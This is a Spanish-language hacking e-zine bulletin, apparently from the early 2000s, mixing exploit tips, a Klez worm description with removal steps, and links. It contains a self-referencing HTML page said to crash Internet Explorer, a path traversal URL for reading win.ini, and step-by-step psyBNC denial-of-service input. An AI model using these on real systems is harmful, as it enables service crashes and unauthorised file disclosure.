aqui os dejo unos bugs escritos por CyERVo





"[ News Und3r] [Boletin de Seguridad, Hacking & Phreaking ]
** Este Mail llega a 2548 Miembros **
][ P0rtal Kaotico is La Covacha Undergr0und ][
by CyERVo


1] Intro
2] Falla en todos los IE
3] Bugs Transversales en varios WebServers
4] psyBNC vulnerable a DoS [Deniales]
5] El worm del momento; klez.e & klez.h
6] Introduccion a la Programacion [de Cero]
7] Cool Links
8] Terminando...


-=========La Covacha Undergr0und=========-
1] Intro
------------------------------------------------------------
Aqui un nuevo boletin, centrado en fallas para el ie, overflow en psybnc's .. algunos tips para intrusiones en webservers, el worm qe arrasa con todo; klez.h y sus variantes.. para finalizar un paper sobre programacion muy recomendado si queres aprender realmente del tema.
Mas info, mas links, mas textos, mas programas...
Just hack it.... =P

2] Falla en todos los IE
------------------------------------------------------------
Podemos abusarnos del tag "OBJECT", haciendo que llame al mismo archivo de donde se encuentra el llamado.
Es decir;
* Creamos un file HTML con el siguiente contenido:
/* from here */
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<OBJECT DATA="LCUMember.HTML" TYPE="text/html"></OBJECT>

<body>

</body>

</html>
/* to here */

* Lo guardamos con el nombre "LCUMember.HTML". Lo ejecutamos, y el archivo se "llamara a si mismo" infinitas veces, sobre cargando la pila del buffer y produciendo un overflow que termina en el cuelgue definitivo de la maquina.

- Vulnerables:
Internet Explorer [Todas las releases ( release = version ) ]

3] Bugs Transversales en varios WebServers
------------------------------------------------------------
http://[objetivo]/../../windows/win.ini
y mostrara el contenido del archivo win.ini. Este bug se encontro en varios webservers... uno de los mas recientes es para
Lil' HTTP Server version 2.2 [http://www.summitcn.com/]

4] psyBNC vulnerable a DoS [Deniales]
------------------------------------------------------------
La falla se centra en que es posible consumir toda la memoria de la maquina donde se esta corriendo, mandando demasiados datos en el campo de password. Esta falla afecta a todas las versiones anteriores a la 2.3 [ sin patch. ]

- Como explotarlo:
1. Conectarse al psyBNC daemon.
2. Enviar data sobre el registro [nuevo user]
ej: user haxorarg [LF/0x10]
nick haxorarg [LF/0x10]
3. Aqui esta el centro de la falla, debemos introducir alrededor de 9000 "+" en bytes. El comando seria:
pass [+de 9000"+"] [LF/0x10]
4. Matar la conexion.
Esto hara que psyBNC cargue el passwd, y consuma paradojicamente mas y mas memoria hasta lograr el cuelgue y su consecuente caida del servidor

5] El worm del momento; klez.e & klez.h
------------------------------------------------------------
Ocupa el primer puesto en todos los rankings de virus. Llega al email con asunto, cuerpo, y mensaje aleatorio, tiene la capacidad de que se autoejecuta el archivo adjunto en determinados clientes de email, por ello es recomendable upgradear el cliente de email, para corregir bugs.
[ Para entender como saltear filtros de seguridad en emails.. recomiendo leer http://www.cyruxnet.com.ar/mailmime.htm ]
Bien ... volviendo... una vez que logro ejecutarse en el equipo, busca en la libreta de direcciones, icq, y archivos locales por direcciones de email, y autoreenviarse utilizando su propio servidor smtp, utiliza en el campo from nombres y direc. tomadas aleatoriamente de lugares por donde busco.
A veces suele llegar haciendo creer al usuario es un "removal " para el virus, cuando en realidad es el mismo worm en si.
Luego se guarda en el directorio $system de windows, con el nombre "Wink[nombre aleatorio].exe" y crea entradas en el registro para ejecutarse a penas se inicia win:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\System\CurrentControlSet\Services\Wink[carácteres aleatorios]

Despues deshabilita los antivirus instalados, se reenvia por los recursos compartidos, y libera la nueva version del virus w98/elkern.

Es decir... un programa muy bien hecho.

- Para eliminarlo:
Manualmente:

Ejecutar el programa REGEDIT.EXE para editar el registro del sistema.
Buscar la clave: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Eliminar en ella las claves Wink[carácteres aleatorios] y WQK.
Buscar y eliminar la clave HKLM\System\CurrentControlSet\Services\Wink[carácteres aleatorios]
Ir al directorio de sistema (normalmente \Windows\System o \Winnt\System) y eliminar el archivo Wink[carácteres aleatorios] y WQK.
Ejecutar un antivirus actualizado y eliminar todo rastro del gusano.
Para realizar estos pasos bajo Windows 2000 o Windows XP primero deberá iniciarlo en modo a prueba de fallas (Safe Mode).

Removal:
http://www.bitdefender-es.com/download/download.php?file=AntiKlez-ES.exe

Fuente:
Alguna tomada del site de VirusAttack.com.ar, otra escrita por mi.

6] Introduccion a la Programacion [de Cero]
------------------------------------------------------------
Si tenes realmente ganas de aprender a programar, que esperas? aqui envio adjunto un paper escrito por Beholder, el proximo va en el boletin siguiente...
Tambien fue posteado en el Foro Bytes:
http://www.folosoft.com/foros/mensajes.php?id=343&catg=983&msg=6104
Cualquier duda sera respondida, solo deben entrar al foro y preguntar lo que no capten.
La idea es, conocer la programacion y la cultura que la rodea para luego poder escalar en cuanto hacking....

7] Cool Links
------------------------------------------------------------
- Excelente tutorial.. "escribiendo buffer overflows".
http://www.securiteam.com/securityreviews/5OP0B006UQ.html
Nota: No vas a entenderlo sin antes haber leido el texto de intro. a programacion.

- El amigo Pistone esta terminando su site; Gaucho Hack. Muy buen diseño y excelente contenido.
http://pistone.hackindex.com/

- Nociones basicas para prevenirse de viruses, worms y de+ chobis.
http://www.cyervonet.com.ar/~lcu/seguridad/viriiprevencion.htm

- Varios manuales muy copados.
http://ossr.phpwebhosting.com/index.php

- Configurando a full el Zone Alarm
http://www.astalavista.com/library/accesscontrol/firewall/zone-alarm.shtml

8] Terminando...
------------------------------------------------------------
- Sobre la renuncia de varios gobernantes argentinos. [OT]
http://www.lanacion.com.ar/02/04/24/do_391130.asp

- Por favor; basta de pedir hackear cuentas de emails!!
el hacking no se centra en "robarle la cuenta de email " a tu profesor, novia, mujer, etc.. si en cambio en comprender como funciona el cifrado de passwords y el metodo para acceder a ellos, usando diversas tecnicas, entender las tecnicas de encriptacion de contraseñas, y como desencriptarlas... se entiende?
asique para todos los que vengan a pedir como hackear una cuenta de email... les voy a dar papers sobre seguridad en ssl, criptologia, programacion, bases de datos, y tecnicas de intrusion.
Gracias...

- Estamos preparando un nuevo meeting con la gente que concurre al canal de irc...
http://www.cyervonet.com.ar/~lcu/msc/canalirc.htm

- Acabo de recibir un cheque de ML .... registrate vos tambien y empeza a ganar $$$ [OT]
http://www.mercadolibre.com.ar/argentina/ml/pms?site=214261&id=231&go=RG

- Les dejo aqui algunas citas de personajes celebres.. para reflexionar.. [OT]

Nuestra mayor gloria no esta en no haber caído nunca,
sino en levantarnos cada vez que caemos.
Goldsmith

El secreto del éxito de la vida del hombre
esta en prepararse para aprovechar
la ocasión cuando se presenta.
Disraelí.

Quien vence la ira vence al más terrible
de los enemigos.
Público Ciro

Nada se pierde con intentar!
Y cuanto se gana con hacerlo.

Estudiar mas no para saber más,
sino para saber mejor que los otros.
SENECA

De mis maestros he aprendido mucho;
de mis colegas más que de mis profesores.
Pero de mis alumnos he aprendido más que de todos.



Slds......"







PD: que os apreveche